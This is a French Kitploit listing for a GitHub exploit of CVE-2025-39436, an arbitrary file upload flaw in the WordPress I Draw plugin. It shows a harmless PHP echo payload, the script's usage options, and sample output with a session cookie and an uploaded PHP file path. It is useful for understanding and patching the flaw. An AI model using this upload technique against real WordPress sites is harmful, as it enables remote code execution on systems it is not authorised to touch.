Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-39436 — Le plugin WordPress I Draw <= 1.0 est vulnérable au téléchargement arbitraire de fichiers. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-39436
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-39436

CVE-2025-39436

Le plugin WordPress I Draw <= 1.0 est vulnérable au téléchargement arbitraire de fichiers.

Voir le dépôt
32il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Exploit de plugin WordPress : CVE-2025-39436

📝 Description

Une vulnérabilité de téléchargement sans restriction de fichier de type dangereux existe dans le plugin WordPress "I Draw". Cet exploit permet aux attaquants de télécharger des fichiers malveillants sans restriction. Le problème impacte les versions d'I Draw jusqu'à la 1.0.


🛠️ Détails de l'exploit

L'exploit exploite la fonctionnalité de téléchargement de fichiers du plugin pour exécuter une charge utile PHP. Ci-dessous la charge utile par défaut utilisée :

root@kitploit:~
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"

🚀 Utilisation

root@kitploit:~
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD

💻 Exemple de sortie du script

root@kitploit:~
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php

⚠️ Avertissement

Ce script est fourni à des fins éducatives uniquement. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit. Utilisez-le à vos propres risques.


Par : Nxploited ( Khaled Alenazi )

Télécharger l’outil